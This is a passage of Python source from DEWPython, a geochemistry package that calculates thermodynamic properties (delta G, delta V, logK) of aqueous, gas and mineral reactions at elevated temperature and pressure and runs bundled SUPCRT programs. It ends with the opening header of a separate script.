waterLst2.append(18.01528/self.RhoWatArr[i])
except:
waterLst2.append(0)
else:
waterLst2.append(0)
waterMatOutGibbs.append(waterLst)
waterMatOutV.append(waterLst2)
if len(waterMatInGibbs) == 0:
waterMatInGibbs = np.zeros((len(self.tKelvin) + 2))
if len(waterMatInV) == 0:
waterMatInV = np.zeros((len(self.tKelvin) + 2))
if len(waterMatOutGibbs) == 0:
waterMatOutGibbs = np.zeros((len(self.tKelvin) + 2))
if len(waterMatOutV) == 0:
waterMatOutV = np.zeros((len(self.tKelvin) + 2))
return waterMatInGibbs, waterMatInV, waterMatOutGibbs, waterMatOutV
def calculate_aq(self):
'''A helper function to calculate the aqueous columns and output them as a matrix. This is called within calculate.'''
aqInGibbs = []
aqOuGibbs = []
aqInV = []
aqOuV = []
for aq in self.inAqMat:
storelst = []
storelst2= []
storelst.append(aq[0])
storelst.append(aq[15])
storelst2.append(aq[0])
storelst2.append(aq[15])
for i in range(len(self.tKelvin)):
storelst.append(aq[2] - aq[4] * (self.tKelvin[i] - T_r)
- aq[11] * (self.tKelvin[i] * np.log(self.tKelvin[i]/T_r) - self.tKelvin[i] + T_r)
- aq[12]*(10**4)*(((1/(self.tKelvin[i]-Theta)) - (1/(T_r-Theta)))*((Theta-self.tKelvin[i])/(Theta))- (self.tKelvin[i]/(Theta*Theta)) * np.log((T_r*(self.tKelvin[i]-Theta))/(self.tKelvin[i]*(T_r-Theta))))
+ aq[7]*(10**-1)*(self.pressureUsed[i]-Pr)
+ aq[8]*(10**2)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr))
+ (1/(self.tKelvin[i]-Theta))*(aq[9]*(self.pressureUsed[i]-Pr)
+ aq[10]*(10**4)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr)))
+ DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*((1/self.DiaArr[i])-1)
- aq[13]*(10**5)*((1/E_PrTr)-1)
+ aq[13]*(10**5)*Upsilon*(self.tKelvin[i]-T_r))
for i in range(len(self.pressureUsed)):
storelst2.append((aq[7]/10 + aq[8]*100/(Psy+self.pressureUsed[i])
+ (aq[9] + aq[10]*10000/(Psy+self.pressureUsed[i]))/(self.tKelvin[i]-Theta)
- DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*(self.QArr[i]*10**-6 )
+ (1/self.DiaArr[i] - 1) * DEWEquations.DEWEquations.calculate_domegadP(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14],self.equation,self.psat))*41.84)
aqInGibbs.append(storelst)
aqInV.append(storelst2)
for aq in self.outAqMat:
storelst = []
storelst2= []
storelst.append(aq[0])
storelst.append(aq[15])
storelst2.append(aq[0])
storelst2.append(aq[15])
for i in range(len(self.tKelvin)):
storelst.append(aq[2] - aq[4] * (self.tKelvin[i] - T_r)
- aq[11] * (self.tKelvin[i] * np.log(self.tKelvin[i]/T_r) - self.tKelvin[i] + T_r)
- aq[12]*(10**4)*(((1/(self.tKelvin[i]-Theta)) - (1/(T_r-Theta)))*((Theta-self.tKelvin[i])/(Theta))- (self.tKelvin[i]/(Theta*Theta)) * np.log((T_r*(self.tKelvin[i]-Theta))/(self.tKelvin[i]*(T_r-Theta))))
+ aq[7]*(10**-1)*(self.pressureUsed[i]-Pr)
+ aq[8]*(10**2)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr))
+ (1/(self.tKelvin[i]-Theta))*(aq[9]*(self.pressureUsed[i]-Pr)
+ aq[10]*(10**4)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr)))
+ DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*((1/self.DiaArr[i])-1)
- aq[13]*(10**5)*((1/E_PrTr)-1)
+ aq[13]*(10**5)*Upsilon*(self.tKelvin[i]-T_r))
for i in range(len(self.pressureUsed)):
storelst2.append((aq[7]/10 + aq[8]*100/(Psy+self.pressureUsed[i])
+ (aq[9] + aq[10]*10000/(Psy+self.pressureUsed[i]))/(self.tKelvin[i]-Theta)
- DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*(self.QArr[i]*10**-6 )
+ (1/self.DiaArr[i] - 1) * DEWEquations.DEWEquations.calculate_domegadP(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14],self.equation,self.psat))*41.84)
aqOuGibbs.append(storelst)
aqOuV.append(storelst2)
if len(aqInGibbs) == 0:
aqInGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(aqOuGibbs) == 0:
aqOuGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(aqInV) == 0:
aqInV = [np.zeros(len(self.tKelvin) + 2)]
if len(aqOuV) == 0:
aqOuV = [np.zeros(len(self.tKelvin) + 2)]
return aqInGibbs, aqOuGibbs, aqInV, aqOuV
def calculate(self):
'''The function called that will update all of the parameters. It has no outputs, but allows certain arrays to be queried.
'''
self.calculate_matrices()
self.waterInpGibbs, self.waterInpV, self.waterOutGibbs, self.waterOutV = self.calculate_H2O()
self.aqInpGibbs, self.aqOutGibbs, self.aqInpV, self.aqOutV = self.calculate_aq()
self.gasInpGibbs, self.gasOutGibbs, self.gasInpV, self.gasOutV = self.calculate_gas()
G1 = np.delete(np.asarray(self.waterInpGibbs), [0,1]).astype(np.float) * int(self.waterInputs[0][1])
V1 = np.delete(np.asarray(self.waterInpV), [0,1]).astype(np.float) * int(self.waterInputs[0][1])
G4 = np.delete(np.asarray(self.waterOutGibbs), [0,1]).astype(np.float) * int(self.waterOutputs[0][1])
V4 = np.delete(np.asarray(self.waterOutV), [0,1]).astype(np.float) * int(self.waterOutputs[0][1])
# Gas Loops
G3, V3 = ([], [])
for i in range(len(self.gasInpGibbs)):
G3.append(np.multiply(np.delete(np.asarray(self.gasInpGibbs[i]), [0,1]).astype(np.float), int(self.gasInpGibbs[i][1])))
V3.append(np.multiply(np.delete(np.asarray(self.gasInpV[i]), [0,1]).astype(np.float), int(self.gasInpV[i][1])))
G3 = np.sum(G3, axis = 0)
V3 = np.sum(V3, axis = 0)
G6, V6 = ([], [])
for i in range(len(self.gasOutGibbs)):
G6.append(np.multiply(np.delete(np.asarray(self.gasOutGibbs[i]), [0,1]).astype(np.float), int(self.gasOutGibbs[i][1])))
V6.append(np.multiply(np.delete(np.asarray(self.gasOutV[i]), [0,1]).astype(np.float), int(self.gasOutV[i][1])))
G6 = np.sum(G6, axis = 0)
V6 = np.sum(V6, axis = 0)
# Aqueous Inputs
G2, V2 = ([], [])
for i in range(len(self.aqInpGibbs)):
G2.append(np.multiply(np.delete(np.asarray(self.aqInpGibbs[i]), [0,1]).astype(np.float), int(self.aqInpGibbs[i][1])))
V2.append(np.multiply(np.delete(np.asarray(self.aqInpV[i]), [0,1]).astype(np.float), int(self.aqInpV[i][1])))
G2 = np.sum(G2, axis = 0)
V2 = np.sum(V2, axis = 0)
G5, V5 = ([], [])
for i in range(len(self.aqOutGibbs)):
G5.append(np.multiply(np.delete(np.asarray(self.aqOutGibbs[i]), [0,1]).astype(np.float), int(self.aqOutGibbs[i][1])))
V5.append(np.multiply(np.delete(np.asarray(self.aqOutV[i]), [0,1]).astype(np.float), int(self.aqOutV[i][1])))
G5 = np.sum(G5, axis = 0)
V5 = np.sum(V5, axis = 0)
dG = [np.sum([G4, G5, G6], axis = 0) - np.sum([G1, G2, G3], axis = 0)]
dV = [np.sum([V4, V5, V6], axis = 0) - np.sum([V1, V2, V3], axis = 0)]
# Adding the mineral contributions if they exist, must be at the same temperatures and pressures
if len(self.mineralInputs) > 0:
for i in range(len(self.mineralInputs)):
if self.psat == False:
myMinPath = mineralDictionary2
else:
myMinPath = mineralDictionary
for temp in self.tempUsed:
self.mineralInpGibbs.append(np.multiply(myMinPath[self.mineralInputs[i][0]]['delG'][myMinPath[self.mineralInputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
self.mineralInpV.append(np.multiply(myMinPath[self.mineralInputs[i][0]]['delV'][myMinPath[self.mineralInputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
dG = np.sum([dG, np.sum([self.mineralInpGibbs], axis = 0)], axis = 0)
dV = np.sum([dV, np.sum([self.mineralInpV], axis = 0)], axis = 0)
if len(self.mineralOutputs) > 0:
for i in range(len(self.mineralOutputs)):
for temp in self.tempUsed:
self.mineralOutGibbs.append(np.multiply(myMinPath[self.mineralOutputs[i][0]]['delG'][myMinPath[self.mineralOutputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
self.mineralOutV.append(np.multiply(myMinPath[self.mineralOutputs[i][0]]['delV'][myMinPath[self.mineralOutputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
dG = np.sum([dG, -np.sum([self.mineralOutGibbs],axis = 0)], axis = 0)
dV = np.sum([dV, -np.sum([self.mineralOutV],axis = 0)], axis = 0)
self.logK = []
self.delG = []
self.delV = []
for i in range(len(dG[0])):
self.logK.append([-dG[0][i]/(2.302585*self.tKelvin[i]*bigR), self.tempUsed[i], self.pressureUsed[i]])
self.delG.append([dG[0][i], self.tempUsed[i], self.pressureUsed[i]])
self.delV.append([dV[0][i], self.tempUsed[i], self.pressureUsed[i]])
# Sets plotting arrays for convenient plotting of isotherms/isobars
if self.ptInput!= 'Psat' or self.psat == False:
self.pressRed = list(set(self.pressureUsed))
self.tempRed = list(set(self.tempUsed))
self.pressRed.sort()
self.tempRed.sort()
temppLogK = defaultdict(list)
temppDelG = defaultdict(list)
temppDelV = defaultdict(list)
temptLogK = defaultdict(list)
temptDelG = defaultdict(list)
temptDelV = defaultdict(list)
for logK, temp, pressure in self.logK:
temppLogK[pressure].append(logK)
temptLogK[temp].append(logK)
for delG, temp, pressure in self.delG:
temppDelG[pressure].append(delG)
temptDelG[temp].append(delG)
for delV, temp, pressure in self.delV:
temppDelV[pressure].append(delV)
temptDelV[temp].append(delV)
for item in temppDelG:
self.pDelG.append(temppDelG[item])
for item in temppDelV:
self.pDelV.append(temppDelV[item])
for item in temppLogK:
self.pLogK.append(temppLogK[item])
for item in temptDelG:
self.tDelG.append(temptDelG[item])
for item in temptDelV:
self.tDelV.append(temptDelV[item])
for item in temptLogK:
self.tLogK.append(temptLogK[item])
return
###############################
####### Methods to auto #######
###############################
def set_tp(self, pt_arr):
'''Setting the PT values, but automated for the helperfunction. Can also be used to quick set tp with prompted input'''
pressArr = []
tempArr = []
self.RhoWatArr = []
self.DiaArr = []
self.QArr =[]
self.gibbsLst = []
self.logK = []
self.vLst = []
self.delG = []
self.delV = []
if self.ptInput == "Custom":
ptSheet =pd.read_csv(inpPath,encoding= 'unicode_escape', header = None)
ptFinder = ptSheet.to_numpy()
tempArr = [float(i[1]) for i in ptFinder[4:]]
pressArr = [float(i[0]) for i in ptFinder[4:]]
elif self.ptInput == "Regular":
try:
templow = pt_arr[0][0]
temphigh =pt_arr[0][1]
tempstep = pt_arr[0][2]
pmin = pt_arr[1][0]
pmax = pt_arr[1][1]
pstep = pt_arr[1][2]
except ValueError:
print('Your PT array is not formatted correctly. Please use the format [[tmin, tmax, tstep][pmin, pmax, pstep]]')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
parrHelp = np.arange(start= pmin, stop = pmax + 1, step = pstep)
for i in range(len(parrHelp)):
pressArr.append([parrHelp[i]]* len(tempArr))
pressArr = np.multiply(pressArr, 1000)
tempArr = [tempArr] * len(parrHelp)
elif self.ptInput == "Psat":
try:
templow = pt_arr[0]
temphigh = pt_arr[1]
tempstep = pt_arr[2]
validBool = True
except ValueError:
print('Your input is not formatted correctly. Please use the format for psat of [tmin, tmax, tstep]')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
for i in range(len(tempArr)):
if tempArr[i] < 100:
pressArr.append(1)
else:
pressArr.append(2.1650906415E-11*np.double(tempArr[i])**5 + 0.0008467019353*np.double(tempArr[i])**2 - 0.17973651666*tempArr[i] + 10.7768850763807)
else:
# If I've done the checking correctly above it should never reach this
raise ValueError("You have not set your options yet, please set them before continuing")
self.tempUsed = np.ndarray.flatten(np.asarray(tempArr))
self.pressureUsed = np.ndarray.flatten(np.asarray(pressArr))
self.tKelvin = np.add(self.tempUsed, 273.15)
# code to set options in a way the equations can understand
if self.ptInput == "Psat":
self.psat = True
else:
self.psat = False
if self.RhoOfWater =='Z&D 2005':
self.equation = 1
elif self.RhoOfWater == 'Z&D 2009':
self.equation = 2
else:
self.equation = 3
if self.dielectricEq == "Supcrt":
self.diaEq = 1
elif self.dielectricEq == "Franck":
self.diaEq = 2
elif self.dielectricEq == "Fernandez":
self.diaEq = 3
elif self.dielectricEq == "Sverjensky":
self.diaEq = 4
else:
self.diaEq = 5
# write code to take in custom Rho, G, and Water Values here
self.densityCollection = np.asarray(self.densityCollection).astype(float)
self.dielectricCollection = np.asarray(self.dielectricCollection).astype(float)
self.gibbsCollection = np.asarray(self.gibbsCollection).astype(float)
# Sets the water density array
for i in range(len(self.pressureUsed)):
# For the custom array
if self.RhoOfWater =="Custom" or (self.forceCustom == True and self.pressureUsed[i] < 1000):
idx = np.intersect1d(np.where(np.asarray(self.densityCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.densityCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.densityCollection[idx][2]):
self.RhoWatArr.append(self.densityCollection[idx][2])
else:
self.RhoWatArr.append(0)
else:
self.RhoWatArr.append(DEWEquations.DEWEquations.calculateDensity(self.pressureUsed[i], self.tempUsed[i], self.equation, 0.01, self.psat))
# Sets the dielectric constant array
for i in range(len(self.pressureUsed)):
# for the custom array
if self.dielectricEq == "Custom":
idx = np.intersect1d(np.where(np.asarray(self.dielectricCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.dielectricCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.dielectricCollection[idx][2]):
self.DiaArr.append(self.dielectricCollection[idx][2])
else:
self.DiaArr.append(0)
else:
if self.ForceSupcrt == True and self.pressureUsed[i] < 5000 and self.psat == False:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], 1, self.psat))
else:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], self.diaEq, self.psat))
# Sets up the Q array
for i in range(len(self.pressureUsed)):
if self.DisplayVol == True:
try:
self.QArr.append(float(DEWEquations.DEWEquations.calculateQ(self.pressureUsed[i], self.tempUsed[i], self.RhoWatArr[i], self.equation, self.diaEq, self.psat))*np.double(10)**6)
except:
self.QArr.append(0)
else:
self.QArr.append(0)
# Sets up custom Gibbs of Water Array:
if self.WaterFreeEq == "Custom":
for i in range(len(self.pressureUsed)):
idx = np.intersect1d(np.where(np.asarray(self.gibbsCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.gibbsCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.gibbsCollection[idx][2]):
self.GibbsH2O.append(self.gibbsCollection[idx][2])
else:
self.GibbsH2O.append(0)
return
def run(self, pt_arr, min_inp =[], aq_inp = [], g_inp = [], h2o_inp = 0, min_out = [],aq_out =[], g_out = [],h2o_out = 0,
ptInp = 'Psat', rhoWat = 'Z&D 2005', forceBool = False, dieEQ = 'Supcrt', forceSC = True,
WFEQ ='D&H 1978', dsV = True, pdsV = True, DV = True, EQ = 1, dEQ = 1, pst = True, mWn = 1, makeP = False):
if h2o_inp > 0:
self.waterInputs = [['yes',h2o_inp]]
else:
self.waterInputs = [['no',0]]
if h2o_out > 0:
self.waterOutputs = [['yes',h2o_out]]
else:
self.waterOutputs = [['no',0]]
self.mineralInputs = min_inp
self.aqueousInputs = aq_inp
self.gasInputs = g_inp
self.mineralOutputs = min_out
self.aqueousOutputs = aq_out
self.gasOutputs = g_out
self.ptInput = ptInp
self.RhoOfWater = rhoWat
self.forceCustom = forceBool
self.dielectricEq = dieEQ
self.ForceSupcrt = forceSC
self.WaterFreeEq = WFEQ
self.DisplayVolOpt = dsV
self.PsatDisplayVol = pdsV
self.DisplayVol = DV
self.equation = EQ
self.diaEq = dEQ
self.psat = pst
self.waterDensity = mWn
# to actually run:
self.set_tp(pt_arr)
self.calculate()
if makeP == True:
self.make_plots()
return
###### MAKE PLOTS###########
def make_plots(self):
'''A final function that the user calls to make the plots possible in the Excel spreadsheet. '''
plt.clf()
###### PSAT PLOTS #######
if self.psat == True or self.ptInput =='Psat':
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.logK])
plt.xlabel('Pressure (bar)')
plt.ylabel('LogK')
plt.title('Pressure vs. LogK Psat Curve')
plt.show()
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.delG])
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$G')
plt.title('Pressure vs. $\Delta$G Psat Curve')
plt.show()
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.delV])
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$V')
plt.title('Pressure vs. $\Delta$V Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.logK])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('LogK')
plt.title('Temperature vs. LogK Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.delG])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('$\Delta$G')
plt.title('Temperature vs. $\Delta$G Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.delV])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('$\Delta$V')
plt.title('Temperature vs. $\Delta$V Psat Curve')
plt.show()
####### NON PSAT PLOTS ########
else:
# T Plots
plt.figure()
for i in self.pDelG:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('$\Delta$G')
plt.title('Temperature vs. $\Delta$G')
plt.show()
plt.figure()
for i in self.pDelV:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('$\Delta$V')
plt.title('Temperature vs. $\Delta$V')
plt.show()
plt.figure()
for i in self.pLogK:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('LogK')
plt.title('Temperature vs. LogK')
plt.show()
# P Plots
plt.figure()
for i in self.tDelG:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$G')
plt.title('Pressure vs. $\Delta$G')
plt.show()
plt.figure()
for i in self.tDelV:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$V')
plt.title('Pressure vs. $\Delta$V')
plt.show()
plt.figure()
for i in self.tLogK:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('LogK')
plt.title('Pressure vs. LogK')
plt.show()
return
#############################
######### OTHER #############
#############################
def export_to_csv(self):
dV = [row[0] for row in self.delV]
dG = [row[0] for row in self.delG]
lK = [row[0] for row in self.logK]
T = [row[1] for row in self.logK]
P = [row[2] for row in self.logK]
output_array = np.column_stack([T,P, dV,dG,lK])
df = pd.DataFrame(output_array)
df.columns = ['Temperature','Pressure','delV','delG','LogK']
name = input('Input the name of the CSV file')
finalName = name + ".csv"
df.to_csv(finalName, index = False)
def options(self):
print('Welcome to DEWPython, here are the options you can run:')
print('1. DEW(): this initializes a Deep Earth Water Model Object')
print(' -The DEW object requires the set_inputs, set_outputs, set_TPRho, and calculate methods to be run.')
print(' -You can also utilize the import_custom_sheets method to import custom CSV data')
print(' -After calculating you can use the make_plots or export_to_csv methods.')
print('2. run_supcrt: this initializes an inline run of SUPCRTBL')
print(' -After initializing the SUPCRTBL object, run calculate_supcrt to store the supcrt outputs in arrays')
print(' -You can also use run_supcrt on a supcrt ouput file that has already been run by adding the optional argument of the file name')
print(' -After this you can run make_supcrt_plots to plot the supcrt files akin the a DEW file')
######################################
####### METHODS FOR SUPCRT ###########
######################################
def outLoop(self):
'''A helper function to allow SUPCRTBL to run'''
running = True
while(running):
line = self.pout.readline().decode(sys.stdout.encoding)
print(line, end='')
running='\n' in line
print('Finished')
def outLoop2(self):
'''A helper function to allow SUPCRT96 to run'''
running = True
while(running):
line = self.pout.readline().decode(sys.stdout.encoding)
running='\n' in line
def run_supcrt(self, version = '96'):
'''A function that runs the pre-compiled SUPCRTBL found in the file folder'''
if version != '96':
sup_path = '/'.join(('resources', 'SUPCRTBL.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
else:
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
self.proc = subprocess.Popen(supPath,shell = True, stdout = subprocess.PIPE, stdin = subprocess.PIPE, stderr = subprocess.STDOUT)
self.pout = self.proc.stdout
self.pin = self.proc.stdin
threading.Thread(target=self.outLoop).start()
while(self.proc.poll() is None):
var = input('User Input: ')
if '.txt' in var:
self.supcrtFile = op.dirname(op.abspath(__file__)) + '\\resources\\' + var
inp=bytearray(var +'\n', sys.stdin.encoding)
if(self.proc.poll() is None):
self.pin.write(inp)
self.pin.flush()
return
def calculate_supcrt_special(self, customFile = None):
'''Calculates the output from either SUPCRTBL/SUPCRT96 at isothermal/isobaric temperatures'''
returnLst = {}
if customFile != None:
filename = op.dirname(op.abspath(os.getcwd()))+ '\\' + customFile
elif len(self.supcrtFile) ==0:
raise ValueError("You haven't run SUPCRT yet")
else:
filename = self.supcrtFile
with open(filename, 'r') as f:
impor = f.read()
import_data = impor.replace('\t', ' ')
split = import_data.split('\n')
for i in range(len(split)):
try:
if 'ISOTHERMS(degC)' in split[i]:
finalTemp = " ".join(split[i].split()).split(' ')[5]
finalPress = " ".join(split[i+1].split()).split(' ')[6]
returnVar = input('Enter reaction title')
except:
continue
if 'STANDARD STATE PROPERTIES OF THE REACTION AT ELEVATED TEMPERATURES AND PRESSURES' in split[i]:
subLst = []
temp = []
pres = []
DH2 = []
lgK = []
dlG = []
dlH = []
dlS = []
dlV = []
dlCp = []
subDict = {}
for item in split[(i+4):]:
if len(item) > 0:
subLst = (" ".join(item.split())).split(' ')
try:
float(subLst[0])
except:
continue
try:
a = subLst[0]
b = subLst[1]
c = subLst[2]
d = subLst[3]
e = subLst[4]
f = subLst[5]
g = subLst[6]
h = subLst[7]
i = subLst[8]
temp.append(a)
pres.append(b)
DH2.append(c)
lgK.append(d)
dlG.append(e)
dlH.append(f)
dlS.append(g)
dlV.append(h)
dlCp.append(i)
if float(subLst[0]) == finalTemp and float(subLst[1]) == finalPress:
break
except:
continue
subDict['Temperature'] = [float(i) for i in temp]
subDict['Pressure'] = [float(i) for i in pres]
DH2Lst = []
lgKLst = []
dlGLst = []
dlHLst = []
dlSLst = []
dlVLst = []
dlCpLst = []
for i in range(len(DH2)):
try:
DH2Lst.append(float(DH2[i]))
except:
DH2Lst.append(0)
try:
lgKLst.append(float(lgK[i]))
except:
lgKLst.append(0)
try:
dlGLst.append(float(dlG[i]))
except:
dlGLst.append(0)
try:
dlHLst.append(float(dlH[i]))
except:
dlHLst.append(0)
try:
dlSLst.append(float(dlS[i]))
except:
dlSLst.append(0)
try:
dlVLst.append(float(dlV[i]))
except:
dlVLst.append(0)
try:
dlCpLst.append(dlCp[i])
except:
dlCpLst.append[0]
subDict['DH2O'] = DH2Lst
subDict['LogK'] = lgKLst
subDict['delG'] = dlGLst
subDict['delH'] = dlHLst
subDict['delS'] = dlSLst
subDict['delV'] = dlVLst
subDict['delCp'] = dlCpLst
returnLst[returnVar] = subDict
self.supcrtOut = returnLst
def supcrt_inp(self, rxn_lst, title, reaction_type = 'psat'):
'''Takes a list of reaction lists (comprised of tuples) and runs supcrt'''
for reaction in rxn_lst:
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
self.proc = subprocess.Popen(supPath,stdout=subprocess.PIPE, stdin=subprocess.PIPE,stderr=subprocess.STDOUT, shell=True)
self.pout = self.proc.stdout
self.pin = self.proc.stdin
it = 0
rxnVar = 'realReac.con'
if reaction_type != 'psat':
rxnVar = 'Xtend.con'
if len(title) < 1:
title = input('What is the title of your reaction?')
comm = ['n', 'updateSlop1.dat', '2', rxnVar, '2', '1', title]
for component in reaction:
if component[1] not in nameLst:
print(str(component[1]) + ' is not in the slop16 database. Please check your spelling and try again. You can use the search function the query the database.')
else:
comm.append(str(component[0]) + ' ' + component[1])
comm.append('0')
comm.append('y')
comm.append('n')
comm.append(title + '.txt')
comm.append('1')
comm.append('1')
comm.append('empty')
threading.Thread(target=self.outLoop2).start()
while(self.proc.poll() is None):
try:
inp = comm[it]
it += 1
# inp = bytearray(input('User Input: ')+'\n',sys.stdin.encoding)
if(self.proc.poll() is None):
self.pin.write(bytearray(inp+'\n',sys.stdin.encoding))
self.pin.flush()
except:
pass
return
def calculate_supcrt(self, customFile = None):
'''Calculates an output of thermodynamic properties from a SUPCRTBL output file in the same directory. User must input
stopping temperature and pressure to allow the program to calculate properly.
'''
returnLst = {}
max_temp = input('Input the Maximum Temperature')
max_press = input('Input the Maximum Pressure')
max_temp = float(max_temp)
max_press = float(max_press)
if customFile != None:
file_Path = op.dirname(op.abspath(os.getcwd()))+ '\\' + customFile
elif len(self.supcrtFile) ==0:
raise ValueError("You haven't run SUPCRT yet")
else:
filename = self.supcrtFile
filePath='/'.join(('resources', filename))
file_Path = pkg_resources.resource_filename(resource_package, filepath)
with open(file_Path, 'r') as f:
impor = f.read()
import_data = impor.replace('\t', ' ')
split = import_data.split('\n')
for i in range(len(split)):
try:
if 'REACTION TITLE' in split[i]:
returnVar = " ".join(split[i+1].split()).split(' ')[0]
elif '************************************ REACTION' in split[i]:
returnVar = " ".join(split[i+4].split()).split(' ')[0]
except:
continue
if 'STANDARD STATE PROPERTIES OF THE REACTION AT ELEVATED TEMPERATURES AND PRESSURES' in split[i]:
subLst = []
temp = []
pres = []
DH2 = []
lgK = []
dlG = []
dlH = []
dlS = []
dlV = []
dlCp = []
subDict = {}
for item in split[(i+7):]:
try:
if len(item) > 0:
subLst = (" ".join(item.split())).split(' ')
temp.append(subLst[0])
pres.append(subLst[1])
DH2.append(subLst[2])
lgK.append(subLst[3])
dlG.append(subLst[4])
dlH.append(subLst[5])
dlS.append(subLst[6])
dlV.append(subLst[7])
dlCp.append(subLst[8])
if float(subLst[0]) == max_temp and float(subLst[1]) == max_press:
break
except:
continue
subDict['Temperature'] = [float(i) for i in temp]
subDict['Pressure'] = [float(i) for i in pres]
subDict['DH2O'] = [float(i) for i in DH2]
subDict['LogK'] = [float(i) for i in lgK]
subDict['delG'] = [float(i) for i in dlG]
subDict['delH'] = [float(i) for i in dlH]
subDict['delS'] = [float(i) for i in dlS]
storeLst = []
for i in dlV:
if i =='*********' or i =='NaN':
storeLst.append(0)
else:
storeLst.append(i)
subDict['delV'] = storeLst
subDict['delCp'] = [float(i) for i in dlCp]
returnLst[returnVar] = subDict
self.supcrtOut = returnLst
def make_supcrt_plots(self):
'''Creates plots of LogK and delV for already-calculated SUPCRTBL functions. Produces the same set of plots as the DEW produces'''
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['LogK'])
plt.title('LogK vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('LogK')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['LogK'])
plt.title('LogK vs. Pressure for ' + i)
plt.ylabel('LogK')
plt.xlabel('Pressure (Kb)')
plt.show()
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['delG'])
plt.title('delV vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('delG')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['delG'])
plt.title('delV vs. Pressure for ' + i)
plt.ylabel('delG')
plt.xlabel('Pressure (Kb)')
plt.show()
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['delV'])
plt.title('delV vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('delV')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['delV'])
plt.title('delV vs. Temp for ' + i)
plt.ylabel('delV')
plt.xlabel('Pressure (Kb)')
plt.show()
# In[9]:
# In[ ]:
|
BuildConsolidatedFeaturesFile.py
|
# python-3
# coding: utf-8
'''
Script Name: BuildConsolidatedFeaturesFile.py
Created date : Sunday, 27th March
Author : Sreejith Menon
Description :
